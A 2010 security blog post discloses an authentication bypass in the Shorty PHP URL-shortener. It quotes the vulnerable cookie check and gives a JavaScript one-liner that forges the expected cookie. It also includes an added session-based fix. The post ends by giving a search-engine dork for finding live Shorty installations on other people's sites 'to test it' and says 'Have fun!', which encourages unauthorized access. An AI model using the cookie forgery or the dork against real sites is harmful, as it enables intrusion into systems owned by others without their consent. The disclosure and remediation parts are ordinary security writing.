Friday 16 April 2010

Shorty Authentication Bypass

(This post was originally published on my personal blog and was also featured on the exploit-db.com website)

Today, reading some stuff on the internet, I found an article about 7 PHP scripts to generate short URLs. These kinds of links are very common today, with a lot of controversy about the security risks they imply. I'm not here (now) to discuss URL-shortening services but to talk about a stupid bug that I found in the first (!!!) piece of software that WebResourcesDepot recommends today.
Shorty is a very old script, from 2006. Why are they recommending it in the first place? Second: did they try to install it? A lot of errors appear when you try a fresh install, and it takes some pain until you can fix them. Buggy from scratch.
I then decided to read some source code. I found that functions.php contains a bug that we can use to bypass the login form. Let's read some PHP code:
function authenticate(){
    // The "logged in" state is nothing more than a cookie sent by the client;
    // the expected value is a constant hard-coded here, so anyone who has read
    // the source can set it themselves.
    $cookie = @$_COOKIE['snickerdoodle'];
    if($cookie == "polarbears"){
        // authenticated: fall through and let the page render
    } else {
        exit("Not logged in.");
    }
}

function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    // Same fixed comparison: returns 1 when the cookie holds the magic value
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}
As you can read, this code checks for a cookie named "snickerdoodle" with the value "polarbears" to determine whether you are authenticated or not. It's very easy to create a new cookie with this data in your browser using some Firefox extension. If you are using a browser without extensions, like Google Chrome, you can try typing the following JavaScript statement into your URL bar:
javascript:document.cookie="snickerdoodle=polarbears";
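For comparison, here is how a maintainer would replace the two functions above so that the login state lives on the server instead of in a cookie whose expected value is written in the source. This is an added example, not Shorty's own code; the password hash location (a config file) and the placeholder password are assumptions.

```php
<?php
// Added example, not Shorty's code: drop-in replacements for authenticate() and
// verify() from functions.php. The browser only holds an opaque session id; the
// "authenticated" flag never leaves the server, so there is no magic value to set.

// The hash belongs in a config file outside the web root, created once with
// password_hash(). For this self-contained example it is built at startup from a
// constructed placeholder password.
define('ADMIN_PASSWORD_HASH', password_hash('change-me-before-deploying', PASSWORD_DEFAULT));

function start_session(): void {
    if (session_status() === PHP_SESSION_NONE) {
        // Session cookie is unreadable from JavaScript and only sent over HTTPS.
        session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
        session_start();
    }
}

// Called by the login form handler. Returns true only if the password matches.
function login(string $password): bool {
    start_session();
    if (!password_verify($password, ADMIN_PASSWORD_HASH)) {
        return false;
    }
    // Fresh session id after login, so a pre-set (fixated) id is never upgraded.
    session_regenerate_id(true);
    $_SESSION['authenticated'] = true;
    return true;
}

// Drop-in for Shorty's verify(): 1 if logged in, 0 otherwise.
function verify(): int {
    start_session();
    return !empty($_SESSION['authenticated']) ? 1 : 0;
}

// Drop-in for Shorty's authenticate(): stop the request if not logged in.
function authenticate(): void {
    if (verify() !== 1) {
        http_response_code(403);
        exit("Not logged in.");
    }
}

function logout(): void {
    start_session();
    $_SESSION = [];
    session_destroy();
}
```

With this change, the cookie trick from the post no longer works: a forged cookie carries a session id that has no server-side "authenticated" flag, so verify() returns 0.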
If you don't want to install Shorty (and mess around with all the hacks you have to do to use it), you can always use the search intitle:"Shorty (Beta)" to find some places to test it.
Have fun!
